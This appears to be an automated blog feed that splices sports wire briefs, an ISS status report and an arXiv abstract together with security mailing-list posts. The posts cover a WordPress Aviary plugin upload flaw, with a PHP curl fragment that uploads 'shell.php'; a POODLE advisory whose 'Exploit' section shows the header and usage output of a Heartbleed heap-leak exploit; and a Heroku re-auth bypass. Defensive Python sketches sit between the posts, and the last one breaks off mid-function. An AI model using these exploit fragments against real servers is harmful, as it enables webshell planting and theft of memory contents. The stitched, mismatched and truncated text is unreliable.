Vulnerability: There is a remote file upload vulnerability in aviary-image-editor-add-on-for-gravity-forms/includes/upload.php, as an unauthenticated user can upload any file to the system, including a .php file. The upload.php doesn't check that the user is authenticated and a simple post will allow arbitrary code to be uploaded to the server.

In the file aviary-image-editor-add-on-for-gravity-forms/includes/upload.php the code doesn’t check for an authenticated Wordpress user:

    [...]
    $max_file_size ){
            $msg = "File Size is too big.";
            $error_flag = true;
        }
        $extension = strtolower(end(explode('.', $image_file['name'])));
        $aa_options = get_option('gf_aa_options');
        $supported_files = $aa_options['supported_file_format'];
        $supported_files = strtolower($supported_files);
        if(!$error_flag && $supported_files != '' ){
            $supported_files = explode (',', $supported_files);
            if(!in_array($extension, $supported_files)){
                $msg = "No Supported file.";
                $error_flag = true;
            }
        }
        if(!$error_flag){
            $wp_upload_dir = wp_upload_dir();
            if(!is_dir($wp_upload_dir['basedir'].'/gform_aviary')){
                mkdir($wp_upload_dir['basedir'].'/gform_aviary');
            }
            $upload_dir = $wp_upload_dir['basedir'].'/gform_aviary/';
            $upload_url = $wp_upload_dir['baseurl'].'/gform_aviary/';
            $file_name = $upload_dir.$_POST['gf_aviary_field_id'].'_'.$image_file['name'];
            if(move_uploaded_file($image_file['tmp_name'], $file_name)){
                $file_url = $upload_url.$_POST['gf_aviary_field_id'].'_'.$image_file['name'];
            }
        }
        $return_obj = array('status' => 'success', 'message' => $file_url);
        echo json_encode($return_obj);
    }
    ?>

CVEID: 2015-4455
OSVDB:

Exploit Code:

    [...]
    'shell.php','gf_aviary_file'=>'@'.$file_name_with_full_path);

    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL,$target_url);
    curl_setopt($ch, CURLOPT_POST,1);
    curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
    $result=curl_exec ($ch);
    curl_close ($ch);
    echo "
    ";
    echo $result;
    echo "
    ";
    ?>

Source: Gmail -> IFTTT-> Blogger
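A detection sketch for the upload issue described above, added here as an example and not part of the advisory: it scans web server access logs for POSTs to the plugin's upload.php and for requests to script files under the gform_aviary upload directory. The log lines are constructed, and the /wp-content/plugins/ and /wp-content/uploads/ prefixes assume a default WordPress layout.

```python
import re
from collections import namedtuple
from urllib.parse import unquote

# Paths taken from the advisory; the /wp-content/... prefixes seen in the
# sample log are an assumption (default WordPress layout).
PLUGIN_ENDPOINT = "/aviary-image-editor-add-on-for-gravity-forms/includes/upload.php"
UPLOAD_DIR = "/gform_aviary/"

# File names a PHP-enabled web server may execute, including double
# extensions such as "x.php.jpg".
SCRIPT_EXT = re.compile(r"\.(php\d?|phtml|phar|pht)(\.|$)", re.IGNORECASE)

# Apache/nginx "combined" access log line (leading fields only).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

Finding = namedtuple("Finding", "kind ip ts path status")


def scan(lines):
    """Return findings in log order.

    upload_post             - any POST to the plugin's upload.php; the
                              endpoint performs no authentication check,
                              so the log cannot tell callers apart
    script_fetch_after_post - a script file under gform_aviary/ requested
                              by an address that earlier POSTed to upload.php
    script_in_upload_dir    - a script file under gform_aviary/ requested
                              by any other address
    """
    findings = []
    posters = set()
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not an access log line
        path = unquote(m["path"].split("?", 1)[0])
        status = int(m["status"])
        if m["method"] == "POST" and path.endswith(PLUGIN_ENDPOINT):
            posters.add(m["ip"])
            findings.append(Finding("upload_post", m["ip"], m["ts"], path, status))
        elif UPLOAD_DIR in path:
            name = path.rsplit("/", 1)[-1]
            if SCRIPT_EXT.search(name):
                kind = ("script_fetch_after_post" if m["ip"] in posters
                        else "script_in_upload_dir")
                findings.append(Finding(kind, m["ip"], m["ts"], path, status))
    return findings


# Constructed sample log lines (documentation IP ranges).
SAMPLE_LOG = [
    '198.51.100.7 - - [10/Jun/2015:11:02:13 +0000] "POST /wp-content/plugins/'
    'aviary-image-editor-add-on-for-gravity-forms/includes/upload.php HTTP/1.1" 200 97',
    '198.51.100.7 - - [10/Jun/2015:11:02:15 +0000] "GET /wp-content/uploads/'
    'gform_aviary/3_shell.php HTTP/1.1" 200 512',
    '192.0.2.44 - - [10/Jun/2015:11:05:40 +0000] "GET /wp-content/uploads/'
    'gform_aviary/3_photo.jpg HTTP/1.1" 200 48211',
    '192.0.2.90 - - [10/Jun/2015:11:09:01 +0000] "GET /wp-content/uploads/'
    'gform_aviary/9_a.PHP?x=1 HTTP/1.1" 404 0',
    '192.0.2.44 - - [10/Jun/2015:11:10:00 +0000] "GET /index.php HTTP/1.1" 200 1024',
]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f.kind, f.ip, f.status, f.path)
```

A 200 status on a script_fetch_after_post finding means the uploaded file was served, so the file itself should be inspected on disk.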

Trinidad AG: Gov't feared ex-FIFA VP Warner a flight risk

PORT-OF-SPAIN, Trinidad (AP) Trinidad Attorney General Garvin Nicholas said Wednesday that officials feared former FIFA Vice President Jack Warner would flee the island after facing U.S. federal corruption charges, but they're now confident he'll stay in the country.

from FOX Sports Digital http://ift.tt/1F9ir62
via IFTTT

Argentine willing to be extradited to US in FIFA case

BUENOS AIRES, Argentina (AP) An Argentine businessman who was indicted by U.S. authorities in the FIFA corruption case says he is willing to be extradited to the U.S. from Italy, where he is being held.

from FOX Sports Digital http://ift.tt/1IGEh8X
via IFTTT

[FD] This POODLE Bites: Exploiting The SSL 3.0 Fallback

Introduction

SSL 3.0 [RFC6101] is an obsolete and insecure protocol. While for most practical purposes it has been replaced by its successors TLS 1.0 [RFC2246], TLS 1.1 [RFC4346], and TLS 1.2 [RFC5246], many TLS implementations remain backwards-compatible with SSL 3.0 to interoperate with legacy systems in the interest of a smooth user experience. The protocol handshake provides for authenticated version negotiation, so normally the latest protocol version common to the client and the server will be used.

The POODLE Attack

To work with legacy servers, many TLS clients implement a downgrade dance: in a first handshake attempt, offer the highest protocol version supported by the client; if this handshake fails, retry (possibly repeatedly) with earlier protocol versions. Unlike proper protocol version negotiation (if the client offers TLS 1.2, the server may respond with, say, TLS 1.0), this downgrade can also be triggered by network glitches, or by active attackers. So if an attacker that controls the network between the client and the server interferes with any attempted handshake offering TLS 1.0 or later, such clients will readily confine themselves to SSL 3.0.

Recommendations

The attack described above requires an SSL 3.0 connection to be established, so disabling the SSL 3.0 protocol in the client or in the server (or both) will completely avoid it. If either side supports only SSL 3.0, then all hope is gone, and a serious update required to avoid insecure encryption. If SSL 3.0 is neither disabled nor the only possible protocol version, then the attack is possible if the client uses a downgrade dance for interoperability.

Impact

The POODLE attack can be used against any system or application that supports SSL 3.0 with CBC mode ciphers. This affects most current browsers and websites, but also includes any software that either references a vulnerable SSL/TLS library (e.g. OpenSSL) or implements the SSL/TLS protocol suite itself.

By exploiting this vulnerability in a likely web-based scenario, an attacker can gain access to sensitive data passed within the encrypted web session, such as passwords, cookies and other authentication tokens that can then be used to gain more complete access to a website (impersonating that user, accessing database content, etc.).

Solution

There is currently no fix for the vulnerability SSL 3.0 itself, as the issue is fundamental to the protocol; however, disabling SSL 3.0 support in system/application configurations is the most viable solution currently available.

Some of the same researchers that discovered the vulnerability also developed a fix for one of the prerequisite conditions; TLS_FALLBACK_SCSV is a protocol extension that prevents MITM attackers from being able to force a protocol downgrade. OpenSSL has added support for TLS_FALLBACK_SCSV to their latest versions and recommend the following upgrades:

- OpenSSL 1.0.1 users should upgrade to 1.0.1j.
- OpenSSL 1.0.0 users should upgrade to 1.0.0o.
- OpenSSL 0.9.8 users should upgrade to 0.9.8zc.

Both clients and servers need to support TLS_FALLBACK_SCSV to prevent downgrade attacks.

Other SSL 3.0 implementations are most likely also affected by POODLE. Contact your vendor for details. Additional vendor information may be available in the National Vulnerability Database (NVD) entry for CVE-2014-3566 or in CERT Vulnerability Note VU#577193.[7]

Vulnerable TLS implementations need to be updated. CVE ID assignments and vendor information are also available in the NVD.[8]

Exploit

/*
 * Heartbleed OpenSSL information leak exploit
 * =========================================================
 * This exploit uses OpenSSL to create an encrypted connection
 * and trigger the heartbleed leak. The leaked information is
 * returned within encrypted SSL packets and is then decrypted
 * and wrote to a file to annoy IDS/forensics. The exploit can
 * set heartbeat payload length arbitrarily or use two preset
 * values for NULL and MAX length. The vulnerability occurs due
 * to bounds checking not being performed on a heap value which
 * is user supplied and returned to the user as part of DTLS/TLS
 * heartbeat SSL extension. All versions of OpenSSL 1.0.1 to
 * 1.0.1f are known affected. You must run this against a target
 * which is linked to a vulnerable OpenSSL library using DTLS/TLS.
 * This exploit leaks upto 65535 bytes of remote heap each request
 * and can be run in a loop until the connected peer ends connection.
 * The data leaked contains 16 bytes of random padding at the end.
 * The exploit can be used against a connecting client or server,
 * it can also send pre_cmd's to plain-text services to establish
 * an SSL session such as with STARTTLS on SMTP/IMAP/POP3. Clients
 * will often forcefully close the connection during large leak
 * requests so try to lower your payload request size.
 *
 * Compiled on ArchLinux x86_64 gcc 4.8.2 20140206 w/OpenSSL 1.0.1g
 *
 * E.g.
 * $ gcc -lssl -lssl3 -lcrypto heartbleed.c -o heartbleed
 * $ ./heartbleed -s 192.168.11.23 -p 443 -f out -t 1
 * [ heartbleed OpenSSL information leak exploit
 * [ =============================================================
 * [ connecting to 192.168.11.23 443/tcp
 * [ connected to 192.168.11.23 443/tcp
 * [ <3 <3 <3 heart bleed <3 <3 <3
 * [ heartbeat returned type=24 length=16408
 * [ decrypting SSL packet
 * [ heartbleed leaked length=65535
 * [ final record type=24, length=16384
 * [ wrote 16381 bytes of heap to file 'out'
 * [ heartbeat returned type=24 length=16408
 * [ decrypting SSL packet
 * [ final record type=24, length=16384
 * [ wrote 16384 bytes of heap to file 'out'
 * [ heartbeat returned type=24 length=16408
 * [ decrypting SSL packet
 * [ final record type=24, length=16384
 * [ wrote 16384 bytes of heap to file 'out'
 * [ heartbeat returned type=24 length=16408
 * [ decrypting SSL packet
 * [ final record type=24, length=16384
 * [ wrote 16384 bytes of heap to file 'out'
 * [ heartbeat returned type=24 length=42
 * [ decrypting SSL packet
 * [ final record type=24, length=18
 * [ wrote 18 bytes of heap to file 'out'
 * [ done.
 * $ ls -al out
 * -rw

Source: Gmail -> IFTTT-> Blogger
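The downgrade dance and the TLS_FALLBACK_SCSV countermeasure described above, modelled as an added example (not code from the post or from OpenSSL). The protocol version numbers, the SCSV value 0x5600 and the inappropriate_fallback alert (86) follow RFC 7507; the function names and the simplified handshake are assumptions of this sketch.

```python
# Protocol versions as they appear in ClientHello.client_version.
SSL3, TLS10, TLS11, TLS12 = 0x0300, 0x0301, 0x0302, 0x0303

TLS_RSA_WITH_AES_128_CBC_SHA = 0x002F   # an ordinary CBC cipher suite
TLS_FALLBACK_SCSV = 0x5600              # signalling suite, RFC 7507
ALERT_PROTOCOL_VERSION = 70
ALERT_INAPPROPRIATE_FALLBACK = 86


class HandshakeFailed(Exception):
    def __init__(self, alert, code):
        super().__init__(alert)
        self.alert = alert
        self.code = code


def server_negotiate(server_versions, server_checks_scsv,
                     client_version, cipher_suites):
    """Server side of version negotiation (simplified, hypothetical helper)."""
    # RFC 7507: a fallback retry that offers less than the server's best
    # version is refused with a fatal alert.
    if (server_checks_scsv and TLS_FALLBACK_SCSV in cipher_suites
            and client_version < max(server_versions)):
        raise HandshakeFailed("inappropriate_fallback",
                              ALERT_INAPPROPRIATE_FALLBACK)
    usable = [v for v in server_versions if v <= client_version]
    if not usable:
        raise HandshakeFailed("protocol_version", ALERT_PROTOCOL_VERSION)
    return max(usable)


def downgrade_dance(client_versions, client_sends_scsv,
                    server_versions, server_checks_scsv,
                    lost_hellos=frozenset()):
    """Client retry loop: offer the highest version, then fall back.

    lost_hellos is the set of offered versions whose handshake never
    completes (a network glitch or on-path interference, the model does
    not distinguish). Returns (negotiated_version_or_None, attempts).
    """
    highest = max(client_versions)
    attempts = []
    for offered in sorted(client_versions, reverse=True):
        suites = [TLS_RSA_WITH_AES_128_CBC_SHA]
        # The SCSV is only added on retries below the client's best version.
        if client_sends_scsv and offered < highest:
            suites.append(TLS_FALLBACK_SCSV)
        if offered in lost_hellos:
            attempts.append((offered, "no response"))
            continue
        try:
            version = server_negotiate(server_versions, server_checks_scsv,
                                       offered, suites)
        except HandshakeFailed as err:
            attempts.append((offered, err.alert))
            continue
        attempts.append((offered, "ok"))
        return version, attempts
    return None, attempts


ALL = (SSL3, TLS10, TLS11, TLS12)
TLS_LOST = frozenset({TLS10, TLS11, TLS12})  # every TLS handshake fails

if __name__ == "__main__":
    cases = {
        "no SCSV, TLS handshakes lost": (ALL, False, ALL, False, TLS_LOST),
        "SCSV both sides, TLS lost":    (ALL, True, ALL, True, TLS_LOST),
        "SCSV client only, TLS lost":   (ALL, True, ALL, False, TLS_LOST),
        "server without SSL 3.0":       (ALL, False, ALL[1:], False, TLS_LOST),
        "legacy server, no loss":       (ALL, True, (SSL3, TLS10), True),
    }
    for name, args in cases.items():
        version, attempts = downgrade_dance(*args)
        print(name, "->", hex(version) if version else None, attempts)
```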

NPR Journalist, Citing Anonymous 'List'

This morning, NPR journalist Diane Rehm had Bernie Sanders on her radio show to discuss a number of issues, including his stances on social security, abortion, immigration, the Affordable Care ...

from Google Alert - anonymous http://ift.tt/1KWJIxU
via IFTTT

Beasley on US roster for CONCACAF Gold Cup

MIAMI BEACH, Fla. (AP) Houston Dynamo defender DaMarcus Beasley is among 35 players on the Americans' preliminary roster for next month's CONCACAF Gold Cup despite announcing his retirement from the U.S. national team in December.

from FOX Sports Digital http://ift.tt/1KqxAHn
via IFTTT

I have a new follower on Twitter


John Sonmez
Want to know the best way to increase your salary or hourly rate? http://t.co/5hjINCbt04
Tampa, FL
http://t.co/0J779E3OFj
Following: 16103 - Followers: 23098

June 10, 2015 at 03:26PM via Twitter http://twitter.com/jsonmez

Swansea signs Ghana forward Andre Ayew

SWANSEA, Wales (AP) Ghana forward Andre Ayew has joined Premier League club Swansea on a four-year deal, subject to international clearance.

from FOX Sports Digital http://ift.tt/1BZemBB
via IFTTT

Williams, Diskerud, Agudelo start for US against Germany

COLOGNE, Germany (AP) U.S. coach Jurgen Klinsmann changed three players for Wednesday night's exhibition against his native Germany, starting Danny Williams, Mix Diskerud and Juan Agudelo in place of Brek Shea, Kyle Beckerman and Alfredo Morales.

from FOX Sports Digital http://ift.tt/1KWtk06
via IFTTT

Swiss attorney general seizes evidence from FIFA offices

BERN, Switzerland (AP) The Swiss attorney-general's office says it has seized more evidence from FIFA headquarters for its investigation into the 2018 and 2022 World Cup bidding contests.

from FOX Sports Digital http://ift.tt/1B2JaGI
via IFTTT

Fantasy MLB: Red Sox 2B Dustin Pedroia 15-for-32 (.469 BA) in his career against Orioles SP Wei-Yin Chen (ESPN)

from ESPN http://ift.tt/1eW1vUH
via IFTTT

ISS Daily Summary Report – 06/09/15

ISS Attitude Control Disturbance:  ISS experienced unexplained torque around 15:27 GMT in the roll axis.  The attitude control system experienced a large number of desats with a continued increase in attitude error.  SARJs were safed and attitude control was handed over to RS thrusters. Preliminary indications seem to point to an approximate 38-second inadvertent 41S thruster firing following a scheduled Kurs checkout in preparation for 41S undocking.  MCC-M performed realtime commanding to stop the thruster firing.  ISS attitude control has been handed back over to the USOS and the ISS is in a stable attitude.  All ISS and Soyuz systems are operating nominally at this time.  Human Research Program (HRP) Collections: Kelly and Cristoforetti continued their collections today with Kelly performing a blood draw to support the Biochemical Profile, Cardio Ox, and Twins Study experiments.  The blood collected was inserted into Minus Eighty Degree Celsius Laboratory Freezer for ISS (MELFI).  Both Kelly and Cristoforetti performed saliva collections for Microbiome and Salivary Markers, and Kelly collected for Twins Study.  Defining the Relation Between Biomarkers of Oxidative and Inflammatory Stress and Atherosclerosis Risk in Astronauts During and After Long-duration Spaceflight (Cardio Ox): Kelly, with Cristoforetti as the Crew Medical Officer (CMO) and remote guidance support from the ground, performed the Flight Day 60 (FD60) ultrasound scans for Cardio Ox followed by blood pressure measurements and logging results. The objective of Cardio Ox is to determine whether biological markers of oxidative and inflammatory stress are elevated during and after space flight and whether this results in an increased, long-term risk of atherosclerosis in astronauts. Crew members provide blood and urine samples to assess biomarkers before launch, three sessions while in space, and again post-flight. 
Ultrasound scans of the carotid and brachial arteries will be obtained at the same time points, as well as through 5 years after landing as an indicator of cardiovascular health. Extravehicular Mobility Unit (EMU) Return To Service (RTS): Following last week’s EMU 3010 Fan Pump Separator (FPS) replacement, Virts performed a checkout of EMU 3010 today, initial results of the checkout were nominal. Crew Quarters (CQ) Deck Cleaning: In preparation for her departure from the ISS, Cristoforetti cleaned her CQ including intake and exhaust ducts, fans and airflow sensors. Space Station Remote Manipulator System (SSRMS) Operations:  Robotics Ground Controllers maneuvered the SSRMS to grapple the Node 2 Power and Data Grapple Fixture (PDGF).  The SSRMS base was then changed to Node 2, and the Lab PDGF was released.  The SSRMS cameras were then used to perform a survey of the external configuration of the Russian Segment.  Finally, the SSRMS was moved to a park position.  MSS performance was nominal.  Today’s Planned Activities All activities were completed unless otherwise noted. TWIN – Saliva Sample Collection PARODONT-2. Activities with Microbial Control and Mouthwash sets HRF Blood Draw and Stow Prep TWIN – Saliva Sample Collection HRF – Sample MELFI Insertion HRF Blood Draw HRF Blood Sample Collection (operator) HRF Refrigerated Centrifuge Configuration Verification of anti-virus scan results on Auxiliary Computer System (ВКС) laptops EMU Post-FPS R&R Tool Stowage HRF – Blood Sample Collection Closeout Ops PROBOY. Activity with RSЕ1 Station laptop. PROBOY. Activity with Penetration Simulator. HRF. Sample MELFI Insertion USND2 – Hardware Activation CARDOX – Preparation Steps and Hardware Setup EMU 3010 Return To Service (RTS) – Part 1 CARDOX – Scan FENIX. 
Transfer of Bioecologiya Containers to Soyuz 715 EXPOSE-R БСПН (Payload Server) data download to RSS1 Laptop ТК 715 Return Stowage CARDOX – Blood Pressure Operations Crew Quarter Cleaning HRF Blood Collection Hardware Stowage PROBOY. Copy and Downlink Data USND2 – Hardware Deactivation WRS Water Sample Analysis WHC Fill [Deferred] OTKLIK. Hardware Check CALCIUM. Photograph, Process and Downlink Photos LBNP Exercise (FINAL) EMU 3010 Return To Service (RTS), Part 2 WHC Fill [Deferred] Verification of ИП-1 Flow Sensor Position EMU 3010 Return To Service (RTS), Part 3 Water Recovery System (WRS). WPA Waste Water Tank Offload into CWC. Start Crew prep for departure Sanitary-Hygiene Status Monitoring / r/g 9032 ALGOMETRIA. Experiment Ops / r/g 9039 TOCA Data Recording Teardown of Chibis-M components. Private Medical Conference Handhold Experiment Platform (HXP) Photo, Part 3 Crew prep for departure Photography of БСК-1 (А457). Water Recovery System (WRS). Terminate WPA Waste Water Tank Offload into CWC EMU 3010 Return To Service (RTS), Part 4 Microbial Sample Collection Removal of ЛКТ (ТА251МБ) and ROM from ТК 715 БО СОЖ Maintenance IMS Delta File Prep TWIN – Preparation for urine sampling Preventive maintenance of MRM1 АСП-О hatch sealing mechanisms and Soyuz 715 Hatch (MRM1) Perform a bag level audit of the PMM1P3 to determine contents at this location Air sampling using АК-1М sampler in SM, FGB ИПД Air Sampling for Ammonia in SM HRF – Hardware Setup CONTROL. Switching Indicator-ISS P/L measuring modes WRS – Recycle Tank Fill Cognition – Experiment Ops COGN – Experiment Ops and Questionnaire Completed Task List Items None Ground Activities All activities were completed unless otherwise noted. 
EMU Return To Service ops SSRMS walkoff to N2 Three-Day Look Ahead: Wednesday, 06/10: Crew Quarters starboard cleaning, Twin Studies, Change of Command ceremony, crew departure prep Thursday, 06/11: 41S undock/landing, Sprint Portable Pulmonary Function setup, Twin Studies Friday, 06/12: Sprint VO2 ops, Radiation Dosimetry QUICK ISS Status – Environmental Control Group:                               Component Status Elektron On Vozdukh Manual [СКВ] 1 – SM Air Conditioner System (“SKV1”) On [СКВ] 2 – SM Air Conditioner System (“SKV2”) Off Carbon Dioxide Removal Assembly (CDRA) Lab Standby Carbon Dioxide Removal Assembly (CDRA) Node 3 Operate Major Constituent Analyzer (MCA) Lab Shutdown Major Constituent Analyzer (MCA) Node 3 Operate Oxygen Generation Assembly (OGA) Process Urine Processing Assembly (UPA) Process Trace Contaminant Control System (TCCS) Lab Off Trace Contaminant Control System (TCCS) Node 3 Full Up  

from ISS On-Orbit Status Report http://ift.tt/1GeBzDI
via IFTTT

Self Organizing Maps Whose Topologies Can Be Learned With Adaptive Binary Search Trees Using Conditional Rotations. (arXiv:1506.02750v1 [cs.NE])

Numerous variants of Self-Organizing Maps (SOMs) have been proposed in the literature, including those which also possess an underlying structure, and in some cases, this structure itself can be defined by the user. Although the concepts of growing the SOM and updating it have been studied, the whole issue of using a self-organizing Adaptive Data Structure (ADS) to further enhance the properties of the underlying SOM, has been unexplored. In an earlier work, we impose an arbitrary, user-defined, tree-like topology onto the codebooks, which consequently enforced a neighborhood phenomenon and the so-called tree-based Bubble of Activity. In this paper, we consider how the underlying tree itself can be rendered dynamic and adaptively transformed. To do this, we present methods by which a SOM with an underlying Binary Search Tree (BST) structure can be adaptively re-structured using Conditional Rotations (CONROT). These rotations on the nodes of the tree are local, can be done in constant time, and performed so as to decrease the Weighted Path Length (WPL) of the entire tree. In doing this, we introduce the pioneering concept referred to as Neural Promotion, where neurons gain prominence in the Neural Network (NN) as their significance increases. We are not aware of any research which deals with the issue of Neural Promotion. The advantage of such a scheme is that the user need not be aware of any of the topological peculiarities of the stochastic data distribution. Rather, the algorithm, referred to as the TTOSOM with Conditional Rotations (TTOCONROT), converges in such a manner that the neurons are ultimately placed in the input space so as to represent its stochastic distribution, and additionally, the neighborhood properties of the neurons suit the best BST that represents the data. These properties have been confirmed by our experimental results on a variety of data sets.



from cs.AI updates on arXiv.org http://ift.tt/1Mmx2kb
via IFTTT

Swiss Justice Dept: 1 of 7 arrested in FIFA case seeks bail

BERN, Switzerland (AP) Switzerland's Justice Department says one of the seven soccer officials arrested in Zurich appealed for bail during the extradition process.

from FOX Sports Digital http://ift.tt/1QLYrx2
via IFTTT

Messi, Neymar try not to be upstaged at Copa America

SANTIAGO, Chile (AP) Lionel Messi and Neymar aren't used to being upstaged.

from FOX Sports Digital http://ift.tt/1GsdESF
via IFTTT

US, Mali, Serbia, Senegal advance to U20 quarterfinals

WELLINGTON, New Zealand (AP) Goalkeepers became heroes as the United States beat Colombia 1-0 and Senegal beat Ukraine 3-1 on penalties in a dramatic opening to the knockout rounds of the Under-20 World Cup on Wednesday.

from FOX Sports Digital http://ift.tt/1QLYpW6
via IFTTT

Report: Lazio president Lotito investigated for extortion

ROME (AP) Lazio president Claudio Lotito's home and offices were raided by authorities on Wednesday, and he's reportedly under investigation for attempted extortion.

from FOX Sports Digital http://ift.tt/1GsdESz
via IFTTT

FIFA postpones start of 2026 World Cup bidding amid turmoil

SAMARA, Russia (AP) FIFA has suspended the 2026 World Cup bidding process amid a widening corruption scandal implicating previous bid contests.

from FOX Sports Digital http://ift.tt/1GsdGKm
via IFTTT

Mali stuns Ghana, Serbia beats Hungary in U20 playoffs

WELLINGTON, New Zealand (AP) The knockout rounds of the Under-20 World Cup opened with a major upset as Mali stunned Ghana 3-0 while 10-man Serbia beat Hungary 2-1 in extra time on Wednesday.

from FOX Sports Digital http://ift.tt/1GsdGKg
via IFTTT

UEFA chief Platini meets with French President Hollande

PARIS (AP) UEFA President Michel Platini met with French President Francois Hollande on Wednesday amid speculation that he will run for the FIFA presidency when Sepp Blatter follows through with his resignation.

from FOX Sports Digital http://ift.tt/1QLYppa
via IFTTT

Newcastle releases Carver, set to announce new manager

NEWCASTLE, England (AP) Newcastle released John Carver from its coaching staff on Wednesday, paving the way for a new manager at the northeast club following a turbulent season in the English Premier League.

from FOX Sports Digital http://ift.tt/1QLYpp4
via IFTTT

Grandma J's Thanks Anonymous Vandal After 'Busiest Week' Ever

HUMBOLDT PARK — The owner of a restaurant vandalized with anti-gentrification demands last week wants to thank the anonymous tagger: The last ...

from Google Alert - anonymous http://ift.tt/1Gs8Mgi
via IFTTT

BBC News Magazine on Twitter: "Overeaters Anonymous is just one of many groups to follow ...

Overeaters Anonymous is just one of many groups to follow Alcoholics ... @BBCNewsMagazine @BBCWorld I need to attend Awesome Anonymous.

from Google Alert - anonymous https://www.google.com/url?rct=j&sa=t&url=https://twitter.com/BBCNewsMagazine/status/608277428306345984/photo/1&ct=ga&cd=CAIyGjgxMzAxNTQ0ZWE3M2NhMmQ6Y29tOmVuOlVT&usg=AFQjCNE9B9-P_vhKgK3x-zt0Bmcn5zFueQ
via IFTTT

[FD] Heroku Bug Bounty #2 - (API) Re Auth Session Bypass Vulnerability

Document Title:
===============
Heroku Bug Bounty #2 - (API) Re Auth Session Bypass Vulnerability

References (Source):
====================
http://ift.tt/1dZCVcy

Video: http://ift.tt/1QkIyTD

Vulnerability Magazine: http://ift.tt/1dsz1Ij

Release Date:
=============
2015-06-09

Vulnerability Laboratory ID (VL-ID):
====================================
1323

Common Vulnerability Scoring System:
====================================
6.1

Product & Service Introduction:
===============================
Heroku provides you with all the tools you need to iterate quickly, and adopt the right technologies for your project. Build modern, maintainable apps and instantly extend them with functionality from hundreds of cloud services providers without worrying about infrastructure. Build. Deploy. Scale. Heroku brings them together in an experience built and designed for developers. Scale your application by moving a slider and upgrade your database in a few simple steps. Whether your growth happens over the year or overnight, you can grow on demand to capture opportunity.

Heroku (pronounced her-OH-koo) is a cloud application platform – a new way of building and deploying web apps. Our service lets app developers spend their time on their application code, not managing servers, deployment, ongoing operations, or scaling. Heroku was founded in 2007 by Orion Henry, James Lindenbaum, and Adam Wiggins.

(Copy of the Vendor Homepage: http://ift.tt/1knQSw2 )

Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research team discovered an application-side session validation vulnerability in the official Heroku API and web-application.

Vulnerability Disclosure Timeline:
==================================
2014-09-19: Researcher Notification & Coordination (Benjamin Kunz Mejri)
2014-09-20: Vendor Notification (Heroku Security Team - Bug Bounty Program)
2015-03-11: Vendor Response/Feedback (Heroku Security Team - Bug Bounty Program)
2015-06-08: Vendor Fix/Patch Notification (Heroku Developer Team)
2015-06-09: Public Disclosure (Vulnerability Laboratory)

Discovery Status:
=================
Published

Affected Product(s):
====================
Heroku
Product: Heroku Dashboard - Web Application (API) 2014 Q3

Exploitation Technique:
=======================
Remote

Severity Level:
===============
High

Technical Details & Description:
================================
An application-side re-auth session bypass vulnerability has been discovered in the official heroku API & web-application service. The vulnerability allows an attacker to request unauthorized information without the second forced re authentication module.

The heroku web-service provides to all web services an expire session function that disallows to visit the page without re authentication. The dataclips page session of the editor and the postgres service allows to add for example new context. If the session expires in the main heroku web-service the user will be forced to login again. During the tests we revealed that the session of the dataclip service and editor is available even if the re-authentication service is still running. If the local attacker changes the path manually to request directly the stored context in the profile (like shown in video) he is able to bypass the security mechanism to add or request the database name.

The session validation mechanism needs to provoke a refresh of the progres datasheet page or the dataclips add through editor to prevent unauthorized access after a session has been expired during the usage of the heroku service.

The security risk of the re-auth session bypass vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 6.1. Exploitation of the vulnerability requires a local low privilege heroku application user account without user interaction. Successful exploitation of the vulnerability results in the evade and bypass of the re-authentication mechanism.

Proof of Concept (PoC):
=======================
The local re auth bypass vulnerability can be exploited by local attackers with low privilege web-application user account or by remote attackers without privilege web-application account and high user interaction. For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.

Manual steps to reproduce the re-auth bypass vulnerability ...
1. Register a webpage account at the official heroku website
2. Provoke the re-auth function that pops up after several profile interaction during the time after the session expired
3. When the session is expired do not press the re-auth function button that popup stable to all service
4. Switch back to the postgres.heroku service and add dataclips or own databases even if the session is expired to all other modules and sites
   Note: Even if all sessions are expired the user is able to request the database and the dataclips in the service without authorization
5. Successful reproduce of the session vulnerability!

Video Demonstration
The video demonstrates the vulnerability in the re-auth function of the heroku service which affects only the heroku service with the dataclips and databases. The session expired values also needs to be recognized in the database service and the site validation request to prevent access without re-auth to heroku itself.

Exception Message:
-Your session has expired
--Your current session has expired or become inactive and has been terminated.

Source: Gmail -> IFTTT-> Blogger
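The advisory's point that session expiry must also be recognised by the dataclips and database service, as an added sketch (not Heroku's code; every class, method and session id here is hypothetical). The first handler trusts a session it validated once, which is the behaviour the advisory describes; the second asks the central session state on every request.

```python
class FakeClock:
    """Deterministic clock so the example runs without sleeping."""
    def __init__(self):
        self.now = 0.0

    def __call__(self):
        return self.now

    def advance(self, seconds):
        self.now += seconds


class CentralAuth:
    """Main web service: owns session state and the idle timeout."""
    def __init__(self, idle_timeout, clock):
        self.idle_timeout = idle_timeout
        self.clock = clock
        self.sessions = {}  # sid -> {"user", "last_seen", "locked"}

    def login(self, sid, user):
        self.sessions[sid] = {"user": user, "last_seen": self.clock(),
                              "locked": False}

    def validate(self, sid):
        """Return the user for a live session, else None.

        An expired session is locked and stays locked until reauth().
        """
        s = self.sessions.get(sid)
        if s is None:
            return None
        if s["locked"] or self.clock() - s["last_seen"] > self.idle_timeout:
            s["locked"] = True
            return None
        s["last_seen"] = self.clock()
        return s["user"]

    def reauth(self, sid, credentials_ok):
        s = self.sessions.get(sid)
        if s is None or not credentials_ok:
            return False
        s["locked"] = False
        s["last_seen"] = self.clock()
        return True


class CachedSessionService:
    """Sub-service that validates a session once and then trusts its cache."""
    def __init__(self, auth):
        self.auth = auth
        self.local = {}

    def handle(self, sid, action):
        if sid not in self.local:
            user = self.auth.validate(sid)
            if user is None:
                return 401, "re-authentication required"
            self.local[sid] = user
        # Central expiry is never consulted again for this sid.
        return 200, f"{action} as {self.local[sid]}"


class CheckedSessionService:
    """Sub-service that checks the central session state on every request."""
    def __init__(self, auth):
        self.auth = auth

    def handle(self, sid, action):
        user = self.auth.validate(sid)
        if user is None:
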